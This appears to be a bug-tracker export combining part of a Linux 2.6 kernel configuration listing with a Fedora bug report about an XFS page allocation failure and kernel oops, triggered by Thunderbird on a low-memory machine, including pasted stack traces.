CONFIG_SCSI_MEGARAID is not set # CONFIG_SCSI_SATA is not set # CONFIG_SCSI_BUSLOGIC is not set # CONFIG_SCSI_CPQFCTS is not set # CONFIG_SCSI_DMX3191D is not set # CONFIG_SCSI_EATA is not set # CONFIG_SCSI_EATA_PIO is not set # CONFIG_SCSI_FUTURE_DOMAIN is not set # CONFIG_SCSI_GDTH is not set # CONFIG_SCSI_IPS is not set # CONFIG_SCSI_INIA100 is not set # CONFIG_SCSI_PPA is not set # CONFIG_SCSI_IMM is not set # CONFIG_SCSI_SYM53C8XX_2 is not set # CONFIG_SCSI_QLOGIC_ISP is not set # CONFIG_SCSI_QLOGIC_FC is not set # CONFIG_SCSI_QLOGIC_1280 is not set CONFIG_SCSI_QLA2XXX=y # CONFIG_SCSI_QLA21XX is not set # CONFIG_SCSI_QLA22XX is not set # CONFIG_SCSI_QLA2300 is not set # CONFIG_SCSI_QLA2322 is not set # CONFIG_SCSI_QLA6312 is not set # CONFIG_SCSI_QLA6322 is not set # CONFIG_SCSI_DC395x is not set # CONFIG_SCSI_DC390T is not set # CONFIG_SCSI_NSP32 is not set # CONFIG_SCSI_DEBUG is not set # # Multi-device support (RAID and LVM) # # CONFIG_MD is not set # # Fusion MPT device support # # CONFIG_FUSION is not set # # IEEE 1394 (FireWire) support # # CONFIG_IEEE1394 is not set # # I2O device support # # CONFIG_I2O is not set # # Networking support # CONFIG_NET=y # # Networking options # CONFIG_PACKET=y CONFIG_PACKET_MMAP=y CONFIG_NETLINK_DEV=y CONFIG_UNIX=y CONFIG_NET_KEY=y CONFIG_INET=y CONFIG_IP_MULTICAST=y CONFIG_IP_ADVANCED_ROUTER=y CONFIG_IP_MULTIPLE_TABLES=y CONFIG_IP_ROUTE_FWMARK=y CONFIG_IP_ROUTE_NAT=y CONFIG_IP_ROUTE_MULTIPATH=y CONFIG_IP_ROUTE_TOS=y CONFIG_IP_ROUTE_VERBOSE=y # CONFIG_IP_PNP is not set # CONFIG_NET_IPIP is not set # CONFIG_NET_IPGRE is not set CONFIG_IP_MROUTE=y # CONFIG_IP_PIMSM_V1 is not set # CONFIG_IP_PIMSM_V2 is not set # CONFIG_ARPD is not set CONFIG_SYN_COOKIES=y CONFIG_INET_AH=y CONFIG_INET_ESP=y CONFIG_INET_IPCOMP=y # # IP: Virtual Server Configuration # # CONFIG_IP_VS is not set # CONFIG_IPV6 is not set CONFIG_NETFILTER=y # CONFIG_NETFILTER_DEBUG is not set # # IP: Netfilter Configuration # CONFIG_IP_NF_CONNTRACK=y CONFIG_IP_NF_FTP=y CONFIG_IP_NF_IRC=y CONFIG_IP_NF_TFTP=y # CONFIG_IP_NF_AMANDA is not set CONFIG_IP_NF_QUEUE=y CONFIG_IP_NF_IPTABLES=y CONFIG_IP_NF_MATCH_LIMIT=y CONFIG_IP_NF_MATCH_IPRANGE=y CONFIG_IP_NF_MATCH_MAC=y CONFIG_IP_NF_MATCH_PKTTYPE=y CONFIG_IP_NF_MATCH_MARK=y CONFIG_IP_NF_MATCH_MULTIPORT=y CONFIG_IP_NF_MATCH_TOS=y CONFIG_IP_NF_MATCH_RECENT=y CONFIG_IP_NF_MATCH_ECN=y CONFIG_IP_NF_MATCH_DSCP=y CONFIG_IP_NF_MATCH_AH_ESP=y CONFIG_IP_NF_MATCH_LENGTH=y CONFIG_IP_NF_MATCH_TTL=y CONFIG_IP_NF_MATCH_TCPMSS=y CONFIG_IP_NF_MATCH_HELPER=y CONFIG_IP_NF_MATCH_STATE=y CONFIG_IP_NF_MATCH_CONNTRACK=y CONFIG_IP_NF_MATCH_OWNER=y CONFIG_IP_NF_FILTER=y CONFIG_IP_NF_TARGET_REJECT=y CONFIG_IP_NF_NAT=y CONFIG_IP_NF_NAT_NEEDED=y CONFIG_IP_NF_TARGET_MASQUERADE=y CONFIG_IP_NF_TARGET_REDIRECT=y CONFIG_IP_NF_TARGET_NETMAP=y CONFIG_IP_NF_TARGET_SAME=y CONFIG_IP_NF_NAT_LOCAL=y CONFIG_IP_NF_NAT_SNMP_BASIC=y CONFIG_IP_NF_NAT_IRC=y CONFIG_IP_NF_NAT_FTP=y CONFIG_IP_NF_NAT_TFTP=y CONFIG_IP_NF_MANGLE=y CONFIG_IP_NF_TARGET_TOS=y CONFIG_IP_NF_TARGET_ECN=y CONFIG_IP_NF_TARGET_DSCP=y CONFIG_IP_NF_TARGET_MARK=y CONFIG_IP_NF_TARGET_CLASSIFY=y CONFIG_IP_NF_TARGET_LOG=y CONFIG_IP_NF_TARGET_ULOG=y CONFIG_IP_NF_TARGET_TCPMSS=y CONFIG_IP_NF_ARPTABLES=y CONFIG_IP_NF_ARPFILTER=y CONFIG_IP_NF_ARP_MANGLE=y CONFIG_IP_NF_TARGET_NOTRACK=y CONFIG_IP_NF_RAW=y CONFIG_XFRM=y # CONFIG_XFRM_USER is not set # # SCTP Configuration (EXPERIMENTAL) # # CONFIG_IP_SCTP is not set # CONFIG_ATM is not set # CONFIG_BRIDGE is not set # CONFIG_VLAN_8021Q is not set # CONFIG_DECNET is not set # CONFIG_LLC2 is not set # CONFIG_IPX is not set # CONFIG_ATALK is not set # CONFIG_X25 is not set # CONFIG_LAPB is not set # CONFIG_NET_DIVERT is not set # CONFIG_ECONET is not set # CONFIG_WAN_ROUTER is not set # CONFIG_NET_FASTROUTE is not set # CONFIG_NET_HW_FLOWCONTROL is not set # # QoS and/or fair queueing # # CONFIG_NET_SCHED is not set # # Network testing # # CONFIG_NET_PKTGEN is not set # CONFIG_KGDBOE is not set # CONFIG_NETPOLL is not set # CONFIG_NETPOLL_RX is not set # CONFIG_NETPOLL_TRAP is not set # CONFIG_NET_POLL_CONTROLLER is not set # CONFIG_HAMRADIO is not set # CONFIG_IRDA is not set # CONFIG_BT is not set CONFIG_NETDEVICES=y CONFIG_DUMMY=y # CONFIG_BONDING is not set # CONFIG_EQUALIZER is not set # CONFIG_TUN is not set # CONFIG_ETHERTAP is not set # # ARCnet devices # # CONFIG_ARCNET is not set # # Ethernet (10 or 100Mbit) # # CONFIG_NET_ETHERNET is not set # # Ethernet (1000 Mbit) # # CONFIG_ACENIC is not set # CONFIG_DL2K is not set # CONFIG_E1000 is not set # CONFIG_NS83820 is not set # CONFIG_HAMACHI is not set # CONFIG_YELLOWFIN is not set # CONFIG_R8169 is not set # CONFIG_SK98LIN is not set # CONFIG_TIGON3 is not set # # Ethernet (10000 Mbit) # # CONFIG_IXGB is not set # CONFIG_S2IO is not set # # Token Ring devices # # CONFIG_TR is not set # # Wireless LAN (non-hamradio) # CONFIG_NET_RADIO=y # # Obsolete Wireless cards support (pre-802.11) # # CONFIG_STRIP is not set # # Wireless 802.11b ISA/PCI cards support # # CONFIG_AIRO is not set CONFIG_HERMES=y # CONFIG_PLX_HERMES is not set # CONFIG_TMD_HERMES is not set CONFIG_PCI_HERMES=y # CONFIG_ATMEL is not set # # Prism GT/Duette 802.11(a/b/g) PCI/Cardbus support # # CONFIG_PRISM54 is not set CONFIG_NET_WIRELESS=y # # Wan interfaces # # CONFIG_WAN is not set # CONFIG_FDDI is not set # CONFIG_HIPPI is not set # CONFIG_PLIP is not set CONFIG_PPP=y # CONFIG_PPP_MULTILINK is not set CONFIG_PPP_FILTER=y CONFIG_PPP_ASYNC=y # CONFIG_PPP_SYNC_TTY is not set CONFIG_PPP_DEFLATE=y # CONFIG_PPP_BSDCOMP is not set # CONFIG_PPPOE is not set CONFIG_SLIP=y CONFIG_SLIP_COMPRESSED=y CONFIG_SLIP_SMART=y CONFIG_SLIP_MODE_SLIP6=y # CONFIG_NET_FC is not set # CONFIG_SHAPER is not set # CONFIG_NETCONSOLE is not set # # ISDN subsystem # # CONFIG_ISDN is not set # # Telephony Support # # CONFIG_PHONE is not set # # Input device support # CONFIG_INPUT=y # # Userland interfaces # CONFIG_INPUT_MOUSEDEV=y CONFIG_INPUT_MOUSEDEV_PSAUX=y CONFIG_INPUT_MOUSEDEV_SCREEN_X=1024 CONFIG_INPUT_MOUSEDEV_SCREEN_Y=768 CONFIG_INPUT_JOYDEV=y # CONFIG_INPUT_TSDEV is not set CONFIG_INPUT_EVDEV=y # CONFIG_INPUT_EVBUG is not set # # Input I/O drivers # CONFIG_GAMEPORT=y CONFIG_SOUND_GAMEPORT=y # CONFIG_GAMEPORT_NS558 is not set # CONFIG_GAMEPORT_L4 is not set CONFIG_GAMEPORT_EMU10K1=y # CONFIG_GAMEPORT_VORTEX is not set # CONFIG_GAMEPORT_FM801 is not set # CONFIG_GAMEPORT_CS461x is not set CONFIG_SERIO=y CONFIG_SERIO_I8042=y CONFIG_SERIO_SERPORT=y # CONFIG_SERIO_CT82C710 is not set # CONFIG_SERIO_PARKBD is not set # CONFIG_SERIO_PCIPS2 is not set # # Input Device Drivers # CONFIG_INPUT_KEYBOARD=y CONFIG_KEYBOARD_ATKBD=y # CONFIG_KEYBOARD_SUNKBD is not set # CONFIG_KEYBOARD_LKKBD is not set # CONFIG_KEYBOARD_XTKBD is not set # CONFIG_KEYBOARD_NEWTON is not set CONFIG_INPUT_MOUSE=y # CONFIG_MOUSE_PS2 is not set CONFIG_MOUSE_SERIAL=y # CONFIG_MOUSE_VSXXXAA is not set CONFIG_INPUT_JOYSTICK=y CONFIG_JOYSTICK_ANALOG=y # CONFIG_JOYSTICK_A3D is not set # CONFIG_JOYSTICK_ADI is not set # CONFIG_JOYSTICK_COBRA is not set # CONFIG_JOYSTICK_GF2K is not set # CONFIG_JOYSTICK_GRIP is not set # CONFIG_JOYSTICK_GRIP_MP is not set # CONFIG_JOYSTICK_GUILLEMOT is not set # CONFIG_JOYSTICK_INTERACT is not set # CONFIG_JOYSTICK_SIDEWINDER is not set # CONFIG_JOYSTICK_TMDC is not set # CONFIG_JOYSTICK_IFORCE is not set # CONFIG_JOYSTICK_WARRIOR is not set # CONFIG_JOYSTICK_MAGELLAN is not set # CONFIG_JOYSTICK_SPACEORB is not set # CONFIG_JOYSTICK_SPACEBALL is not set # CONFIG_JOYSTICK_STINGER is not set # CONFIG_JOYSTICK_TWIDDLER is not set # CONFIG_JOYSTICK_DB9 is not set # CONFIG_JOYSTICK_GAMECON is not set # CONFIG_JOYSTICK_TURBOGRAFX is not set # CONFIG_INPUT_JOYDUMP is not set # CONFIG_INPUT_TOUCHSCREEN is not set CONFIG_INPUT_MISC=y CONFIG_INPUT_PCSPKR=y CONFIG_INPUT_UINPUT=y # CONFIG_INPUT_RAWDEV is not set # # Character devices # CONFIG_VT=y CONFIG_VT_CONSOLE=y CONFIG_HW_CONSOLE=y # CONFIG_SERIAL_NONSTANDARD is not set # # Serial drivers # CONFIG_SERIAL_8250=y # CONFIG_SERIAL_8250_CONSOLE is not set CONFIG_SERIAL_8250_NR_UARTS=4 # CONFIG_SERIAL_8250_EXTENDED is not set # # Non-8250 serial port support # CONFIG_SERIAL_CORE=y CONFIG_UNIX98_PTYS=y CONFIG_LEGACY_PTYS=y CONFIG_LEGACY_PTY_COUNT=256 CONFIG_PRINTER=y # CONFIG_LP_CONSOLE is not set CONFIG_PPDEV=y # CONFIG_TIPAR is not set # CONFIG_QIC02_TAPE is not set # # IPMI # # CONFIG_IPMI_HANDLER is not set # # Watchdog Cards # CONFIG_WATCHDOG=y # CONFIG_WATCHDOG_NOWAYOUT is not set # # Watchdog Device Drivers # # CONFIG_SOFT_WATCHDOG is not set # CONFIG_ACQUIRE_WDT is not set # CONFIG_ADVANTECH_WDT is not set # CONFIG_ALIM1535_WDT is not set # CONFIG_ALIM7101_WDT is not set # CONFIG_SC520_WDT is not set # CONFIG_EUROTECH_WDT is not set # CONFIG_IB700_WDT is not set # CONFIG_WAFER_WDT is not set # CONFIG_I8XX_TCO is not set # CONFIG_SC1200_WDT is not set # CONFIG_SCx200_WDT is not set # CONFIG_60XX_WDT is not set # CONFIG_CPU5_WDT is not set # CONFIG_W83627HF_WDT is not set # CONFIG_W83877F_WDT is not set # CONFIG_MACHZ_WDT is not set # # PCI-based Watchdog Cards # # CONFIG_PCIPCWATCHDOG is not set # CONFIG_WDTPCI is not set # # USB-based Watchdog Cards # # CONFIG_USBPCWATCHDOG is not set CONFIG_HW_RANDOM=y # CONFIG_NVRAM is not set CONFIG_RTC=y # CONFIG_DTLK is not set # CONFIG_R3964 is not set # CONFIG_APPLICOM is not set # CONFIG_SONYPI is not set # # Ftape, the floppy tape device driver # CONFIG_AGP=y # CONFIG_AGP_ALI is not set # CONFIG_AGP_ATI is not set CONFIG_AGP_AMD=y # CONFIG_AGP_AMD64 is not set # CONFIG_AGP_INTEL is not set # CONFIG_AGP_INTEL_MCH is not set # CONFIG_AGP_NVIDIA is not set # CONFIG_AGP_SIS is not set # CONFIG_AGP_SWORKS is not set # CONFIG_AGP_VIA is not set # CONFIG_AGP_EFFICEON is not set CONFIG_DRM=y # CONFIG_DRM_TDFX is not set # CONFIG_DRM_GAMMA is not set # CONFIG_DRM_R128 is not set CONFIG_DRM_RADEON=y # CONFIG_DRM_MGA is not set # CONFIG_DRM_SIS is not set # CONFIG_MWAVE is not set # CONFIG_RAW_DRIVER is not set CONFIG_HANGCHECK_TIMER=y # # I2C support # # CONFIG_I2C is not set # # Misc devices # # CONFIG_IBM_ASM is not set # # Multimedia devices # # CONFIG_VIDEO_DEV is not set # # Digital Video Broadcasting Devices # # CONFIG_DVB is not set # # Graphics support # # CONFIG_FB is not set CONFIG_VIDEO_SELECT=y # # Console display driver support # CONFIG_VGA_CONSOLE=y # CONFIG_MDA_CONSOLE is not set CONFIG_DUMMY_CONSOLE=y # # Sound # CONFIG_SOUND=y # # Advanced Linux Sound Architecture # # CONFIG_SND is not set # # Open Sound System # CONFIG_SOUND_PRIME=y # CONFIG_SOUND_BT878 is not set # CONFIG_SOUND_CMPCI is not set CONFIG_SOUND_EMU10K1=y CONFIG_MIDI_EMU10K1=y # CONFIG_SOUND_FUSION is not set # CONFIG_SOUND_CS4281 is not set # CONFIG_SOUND_ES1370 is not set # CONFIG_SOUND_ES1371 is not set # CONFIG_SOUND_ESSSOLO1 is not set # CONFIG_SOUND_MAESTRO is not set # CONFIG_SOUND_MAESTRO3 is not set # CONFIG_SOUND_ICH is not set # CONFIG_SOUND_SONICVIBES is not set # CONFIG_SOUND_TRIDENT is not set # CONFIG_SOUND_MSNDCLAS is not set # CONFIG_SOUND_MSNDPIN is not set # CONFIG_SOUND_VIA82CXXX is not set CONFIG_SOUND_OSS=y # CONFIG_SOUND_TRACEINIT is not set # CONFIG_SOUND_DMAP is not set # CONFIG_SOUND_AD1816 is not set # CONFIG_SOUND_AD1889 is not set # CONFIG_SOUND_SGALAXY is not set # CONFIG_SOUND_ADLIB is not set # CONFIG_SOUND_ACI_MIXER is not set # CONFIG_SOUND_CS4232 is not set # CONFIG_SOUND_SSCAPE is not set # CONFIG_SOUND_GUS is not set # CONFIG_SOUND_VMIDI is not set # CONFIG_SOUND_TRIX is not set # CONFIG_SOUND_MSS is not set # CONFIG_SOUND_MPU401 is not set # CONFIG_SOUND_NM256 is not set # CONFIG_SOUND_MAD16 is not set # CONFIG_SOUND_PAS is not set # CONFIG_SOUND_PSS is not set # CONFIG_SOUND_SB is not set # CONFIG_SOUND_AWE32_SYNTH is not set # CONFIG_SOUND_WAVEFRONT is not set # CONFIG_SOUND_MAUI is not set # CONFIG_SOUND_YM3812 is not set # CONFIG_SOUND_OPL3SA1 is not set # CONFIG_SOUND_OPL3SA2 is not set # CONFIG_SOUND_YMFPCI is not set # CONFIG_SOUND_UART6850 is not set # CONFIG_SOUND_AEDSP16 is not set # CONFIG_SOUND_ALI5455 is not set # CONFIG_SOUND_FORTE is not set # CONFIG_SOUND_RME96XX is not set # CONFIG_SOUND_AD1980 is not set # # USB support # CONFIG_USB=y CONFIG_USB_DEBUG=y # # Miscellaneous USB options # CONFIG_USB_DEVICEFS=y # CONFIG_USB_BANDWIDTH is not set # CONFIG_USB_DYNAMIC_MINORS is not set # # USB Host Controller Drivers # # CONFIG_USB_EHCI_HCD is not set CONFIG_USB_OHCI_HCD=y # CONFIG_USB_UHCI_HCD is not set # # USB Device Class drivers # # CONFIG_USB_AUDIO is not set # CONFIG_USB_BLUETOOTH_TTY is not set # CONFIG_USB_MIDI is not set # CONFIG_USB_ACM is not set # CONFIG_USB_PRINTER is not set CONFIG_USB_STORAGE=y CONFIG_USB_STORAGE_DEBUG=y # CONFIG_USB_STORAGE_DATAFAB is not set # CONFIG_USB_STORAGE_FREECOM is not set # CONFIG_USB_STORAGE_ISD200 is not set # CONFIG_USB_STORAGE_DPCM is not set # CONFIG_USB_STORAGE_HP8200e is not set # CONFIG_USB_STORAGE_SDDR09 is not set # CONFIG_USB_STORAGE_SDDR55 is not set # CONFIG_USB_STORAGE_JUMPSHOT is not set # # USB Human Interface Devices (HID) # CONFIG_USB_HID=y CONFIG_USB_HIDINPUT=y # CONFIG_HID_FF is not set CONFIG_USB_HIDDEV=y # CONFIG_USB_AIPTEK is not set # CONFIG_USB_WACOM is not set # CONFIG_USB_KBTAB is not set # CONFIG_USB_POWERMATE is not set # CONFIG_USB_MTOUCH is not set # CONFIG_USB_EGALAX is not set # CONFIG_USB_XPAD is not set # CONFIG_USB_ATI_REMOTE is not set # # USB Imaging devices # # CONFIG_USB_MDC800 is not set # CONFIG_USB_MICROTEK is not set # CONFIG_USB_HPUSBSCSI is not set # # USB Multimedia devices # # CONFIG_USB_DABUSB is not set # # Video4Linux support is needed for USB Multimedia device support # # # USB Network adaptors # # CONFIG_USB_CATC is not set # CONFIG_USB_KAWETH is not set # CONFIG_USB_PEGASUS is not set # CONFIG_USB_RTL8150 is not set # CONFIG_USB_USBNET is not set # # USB port drivers # # CONFIG_USB_USS720 is not set # # USB Serial Converter support # # CONFIG_USB_SERIAL is not set # # USB Miscellaneous drivers # # CONFIG_USB_EMI62 is not set # CONFIG_USB_EMI26 is not set # CONFIG_USB_TIGL is not set # CONFIG_USB_AUERSWALD is not set # CONFIG_USB_RIO500 is not set # CONFIG_USB_LEGOTOWER is not set # CONFIG_USB_LCD is not set # CONFIG_USB_LED is not set # CONFIG_USB_CYTHERM is not set # CONFIG_USB_PHIDGETSERVO is not set # CONFIG_USB_TEST is not set # # USB Gadget Support # # CONFIG_USB_GADGET is not set # # File systems # CONFIG_EXT2_FS=y # CONFIG_EXT2_FS_XATTR is not set # CONFIG_EXT3_FS is not set # CONFIG_JBD is not set # CONFIG_REISERFS_FS is not set # CONFIG_JFS_FS is not set # CONFIG_XFS_FS is not set CONFIG_MINIX_FS=y # CONFIG_ROMFS_FS is not set # CONFIG_QUOTA is not set # CONFIG_AUTOFS_FS is not set # CONFIG_AUTOFS4_FS is not set # # CD-ROM/DVD Filesystems # CONFIG_ISO9660_FS=y CONFIG_JOLIET=y CONFIG_ZISOFS=y CONFIG_ZISOFS_FS=y CONFIG_UDF_FS=y # # DOS/FAT/NT Filesystems # CONFIG_FAT_FS=y CONFIG_MSDOS_FS=y CONFIG_VFAT_FS=y # CONFIG_NTFS_FS is not set # # Pseudo filesystems # CONFIG_PROC_FS=y CONFIG_PROC_KCORE=y CONFIG_SYSFS=y # CONFIG_DEVFS_FS is not set # CONFIG_DEVPTS_FS_XATTR is not set CONFIG_TMPFS=y # CONFIG_HUGETLBFS is not set # CONFIG_HUGETLB_PAGE is not set CONFIG_RAMFS=y # # Miscellaneous filesystems # # CONFIG_ADFS_FS is not set # CONFIG_AFFS_FS is not set # CONFIG_HFS_FS is not set # CONFIG_HFSPLUS_FS is not set # CONFIG_BEFS_FS is not set # CONFIG_BFS_FS is not set # CONFIG_EFS_FS is not set # CONFIG_CRAMFS is not set # CONFIG_VXFS_FS is not set # CONFIG_HPFS_FS is not set # CONFIG_QNX4FS_FS is not set # CONFIG_SYSV_FS is not set # CONFIG_UFS_FS is not set # # Network File Systems # CONFIG_NFS_FS=y CONFIG_NFS_V3=y # CONFIG_NFS_V4 is not set # CONFIG_NFS_DIRECTIO is not set CONFIG_NFSD=y CONFIG_NFSD_V3=y # CONFIG_NFSD_V4 is not set CONFIG_NFSD_TCP=y CONFIG_LOCKD=y CONFIG_LOCKD_V4=y CONFIG_EXPORTFS=y CONFIG_SUNRPC=y # CONFIG_RPCSEC_GSS_KRB5 is not set CONFIG_SMB_FS=y # CONFIG_SMB_NLS_DEFAULT is not set # CONFIG_CIFS is not set # CONFIG_NCP_FS is not set # CONFIG_CODA_FS is not set # CONFIG_AFS_FS is not set # # Partition Types # CONFIG_PARTITION_ADVANCED=y # CONFIG_ACORN_PARTITION is not set # CONFIG_OSF_PARTITION is not set # CONFIG_AMIGA_PARTITION is not set # CONFIG_ATARI_PARTITION is not set # CONFIG_MAC_PARTITION is not set CONFIG_MSDOS_PARTITION=y # CONFIG_BSD_DISKLABEL is not set CONFIG_MINIX_SUBPARTITION=y # CONFIG_SOLARIS_X86_PARTITION is not set # CONFIG_UNIXWARE_DISKLABEL is not set # CONFIG_LDM_PARTITION is not set # CONFIG_SGI_PARTITION is not set # CONFIG_ULTRIX_PARTITION is not set # CONFIG_SUN_PARTITION is not set # CONFIG_EFI_PARTITION is not set # # Native Language Support # CONFIG_NLS=y CONFIG_NLS_DEFAULT="iso8859-1" CONFIG_NLS_CODEPAGE_437=y # CONFIG_NLS_CODEPAGE_737 is not set # CONFIG_NLS_CODEPAGE_775 is not set # CONFIG_NLS_CODEPAGE_850 is not set # CONFIG_NLS_CODEPAGE_852 is not set # CONFIG_NLS_CODEPAGE_855 is not set # CONFIG_NLS_CODEPAGE_857 is not set # CONFIG_NLS_CODEPAGE_860 is not set # CONFIG_NLS_CODEPAGE_861 is not set # CONFIG_NLS_CODEPAGE_862 is not set # CONFIG_NLS_CODEPAGE_863 is not set # CONFIG_NLS_CODEPAGE_864 is not set # CONFIG_NLS_CODEPAGE_865 is not set # CONFIG_NLS_CODEPAGE_866 is not set # CONFIG_NLS_CODEPAGE_869 is not set # CONFIG_NLS_CODEPAGE_936 is not set # CONFIG_NLS_CODEPAGE_950 is not set # CONFIG_NLS_CODEPAGE_932 is not set # CONFIG_NLS_CODEPAGE_949 is not set # CONFIG_NLS_CODEPAGE_874 is not set # CONFIG_NLS_ISO8859_8 is not set # CONFIG_NLS_CODEPAGE_1250 is not set # CONFIG_NLS_CODEPAGE_1251 is not set # CONFIG_NLS_ISO8859_1 is not set # CONFIG_NLS_ISO8859_2 is not set # CONFIG_NLS_ISO8859_3 is not set # CONFIG_NLS_ISO8859_4 is not set # CONFIG_NLS_ISO8859_5 is not set # CONFIG_NLS_ISO8859_6 is not set # CONFIG_NLS_ISO8859_7 is not set # CONFIG_NLS_ISO8859_9 is not set # CONFIG_NLS_ISO8859_13 is not set # CONFIG_NLS_ISO8859_14 is not set # CONFIG_NLS_ISO8859_15 is not set # CONFIG_NLS_KOI8_R is not set # CONFIG_NLS_KOI8_U is not set # CONFIG_NLS_UTF8 is not set # # Profiling support # CONFIG_PROFILING=y CONFIG_OPROFILE=y # # Kernel hacking # # CONFIG_DEBUG_KERNEL is not set CONFIG_EARLY_PRINTK=y # CONFIG_LOCKMETER is not set # CONFIG_DEBUG_SPINLOCK_SLEEP is not set # CONFIG_FRAME_POINTER is not set # CONFIG_4KSTACKS is not set # CONFIG_SCHEDSTATS is not set CONFIG_X86_FIND_SMP_CONFIG=y CONFIG_X86_MPPARSE=y # # Security options # # CONFIG_SECURITY is not set # # Cryptographic options # CONFIG_CRYPTO=y CONFIG_CRYPTO_HMAC=y # CONFIG_CRYPTO_NULL is not set # CONFIG_CRYPTO_MD4 is not set CONFIG_CRYPTO_MD5=y CONFIG_CRYPTO_SHA1=y # CONFIG_CRYPTO_SHA256 is not set # CONFIG_CRYPTO_SHA512 is not set CONFIG_CRYPTO_DES=y # CONFIG_CRYPTO_BLOWFISH is not set # CONFIG_CRYPTO_TWOFISH is not set # CONFIG_CRYPTO_SERPENT is not set # CONFIG_CRYPTO_AES is not set # CONFIG_CRYPTO_CAST5 is not set # CONFIG_CRYPTO_CAST6 is not set # CONFIG_CRYPTO_ARC4 is not set CONFIG_CRYPTO_DEFLATE=y # CONFIG_CRYPTO_MICHAEL_MIC is not set # CONFIG_CRYPTO_CRC32C is not set # CONFIG_CRYPTO_TEST is not set # # Library routines # CONFIG_CRC32=y # CONFIG_LIBCRC32C is not set CONFIG_ZLIB_INFLATE=y CONFIG_ZLIB_DEFLATE=y CONFIG_X86_SMP=y CONFIG_X86_HT=y CONFIG_X86_BIOS_REBOOT=y CONFIG_X86_TRAMPOLINE=y CONFIG_PC=y</t>
  </si>
  <si>
    <t>Unhandled Allocation Failure</t>
  </si>
  <si>
    <t>2.6.6-1.414 (Fedora-devel Kernel)</t>
  </si>
  <si>
    <t>2004-06-13 10:50 UTC</t>
  </si>
  <si>
    <t>Ivan Gyurdiev</t>
  </si>
  <si>
    <t>2004-06-24 17:19 UTC</t>
  </si>
  <si>
    <t>Nathan Scott</t>
  </si>
  <si>
    <t>Hi, I decdided to file a bugzilla for this bug, since it seems to have been forgotten on the xfs list/LKML. I am low on memory (128MB), and thunderbird continually crashes because of an XFS allocation failure. I think that happens because it tries to do something with the LKML archive file, which is about 350 MB in size. Then it becomes unkillable, and I can't ls -l in the LKML Mail folder (hangs). Here's the allocation failure and the oops following it (always go together). The only process that causes this is thunderbird, in the circumstances described above. thunderbird-bin: page allocation failure. order:5, mode:0x50 [&lt;0212d155&gt;] __alloc_pages+0x29a/0x2b4 [&lt;0212d187&gt;] __get_free_pages+0x18/0x24 [&lt;0212f6ec&gt;] kmem_getpages+0x15/0x98 [&lt;0212ff3c&gt;] cache_grow+0x7b/0x18e [&lt;02130184&gt;] cache_alloc_refill+0x135/0x164 [&lt;02130562&gt;] __kmalloc+0x64/0x76 [&lt;0a8e7e0a&gt;] xfs_iext_realloc+0x1c8/0x23b [xfs] [&lt;0a8c4883&gt;] xfs_bmap_insert_exlist+0x23/0xae [xfs] [&lt;0a8c1cc7&gt;] xfs_bmap_add_extent_hole_delay+0x42f/0x485 [xfs] [&lt;0218fcd9&gt;] __delay+0x9/0xa [&lt;021f9ec8&gt;] dma_timer_expiry+0x0/0x63 [&lt;0a8bf6e8&gt;] xfs_bmap_add_extent+0x13b/0x38e [xfs] [&lt;0a8c66d9&gt;] xfs_bmapi+0x946/0x104d [xfs] [&lt;0a8f997b&gt;] xfs_trans_read_buf+0x44/0x2d9 [xfs] [&lt;0a8cbe79&gt;] xfs_bmbt_get_state+0xa/0x18 [xfs] [&lt;0a8c4ef4&gt;] xfs_bmap_search_extents+0x3d/0x43 [xfs] [&lt;0a8c60a7&gt;] xfs_bmapi+0x314/0x104d [xfs] [&lt;0a8ea9fe&gt;] xfs_iomap_write_delay+0x54a/0x5b6 [xfs] [&lt;0212c0a1&gt;] mempool_alloc+0x5d/0xf6 [&lt;0a8e9f4c&gt;] xfs_iomap+0x23b/0x3eb [xfs] [&lt;0a8e9ff4&gt;] xfs_iomap+0x2e3/0x3eb [xfs] [&lt;0a90910c&gt;] xfs_bmap+0x1a/0x1e [xfs] [&lt;0a9036f3&gt;] linvfs_get_block_core+0x83/0x234 [xfs] [&lt;021e25f6&gt;] cfq_next_request+0x21/0x37 [&lt;02140f8b&gt;] __wait_on_buffer+0x7d/0x85 [&lt;0a9038b7&gt;] linvfs_get_block+0x13/0x17 [xfs] [&lt;021425a7&gt;] __block_prepare_write+0x146/0x3a5 [&lt;02142e47&gt;] block_prepare_write+0x16/0x22 [&lt;0a9038a4&gt;] linvfs_get_block+0x0/0x17 [xfs] [&lt;0212b79d&gt;] generic_file_aio_write_nolock+0x57e/0x84e [&lt;0a9038a4&gt;] linvfs_get_block+0x0/0x17 [xfs] [&lt;0a8e91d1&gt;] xfs_ichgtime+0xee/0xf6 [xfs] [&lt;0a908e2a&gt;] xfs_write+0x3e5/0x675 [xfs] [&lt;0a9058cf&gt;] linvfs_write+0xa6/0xbc [xfs] [&lt;021400cb&gt;] do_sync_write+0x68/0x9d [&lt;02146f77&gt;] sys_stat64+0x1e/0x23 [&lt;021401b8&gt;] vfs_write+0xb8/0xe4 [&lt;02140252&gt;] sys_write+0x2c/0x42 Unable to handle kernel paging request at virtual address 00012f00 printing eip: 0a8cc8cb *pde = 00000000 Oops: 0002 [#1] Modules linked in: snd_mixer_oss binfmt_misc snd_seq_midi snd_seq_midi_event snd_seq snd_via82xx snd_ac97_codec snd_pcm snd_timer snd_page_alloc gameport snd_mpu401_uart snd_rawmidi snd_seq_device snd soundcore ipv6 parport_pc lp parport iptable_filter ip_tables via_rhine mii floppy sg scsi_mod nls_utf8 nls_cp437 vfat fat ext3 jbd dm_mod usblp uhci_hcd button battery asus_acpi ac xfs CPU: 0 EIP: 0060:[&lt;0a8cc8cb&gt;] Not tainted EFLAGS: 00010206 (2.6.6-1.406) EIP is at xfs_bmbt_set_all+0x2f/0x5c [xfs] eax: 00012f00 ebx: 00000000 ecx: 02daedff edx: 04b32a6c esi: 000001ff edi: 00000000 ebp: 00000000 esp: 04b32888 ds: 007b es: 007b ss: 0068 Process thunderbird-bin (pid: 3799, threadinfo=04b32000 task=041aadf0) Stack: 000012f1 00012f10 00012f0f 0a8c48f7 00000001 000012f0 00000000 02c86cb0 00000000 00000010 0a8c1cc7 04b32a6c 00000000 0237730c 0218fcd9 00000000 00000000 00000000 00000000 03472f00 000012f0 02c86cb0 021f9ec8 000001f6 Call Trace: [&lt;0a8c48f7&gt;] xfs_bmap_insert_exlist+0x97/0xae [xfs] [&lt;0a8c1cc7&gt;] xfs_bmap_add_extent_hole_delay+0x42f/0x485 [xfs] [&lt;0218fcd9&gt;] __delay+0x9/0xa [&lt;021f9ec8&gt;] dma_timer_expiry+0x0/0x63 [&lt;0a8bf6e8&gt;] xfs_bmap_add_extent+0x13b/0x38e [xfs] 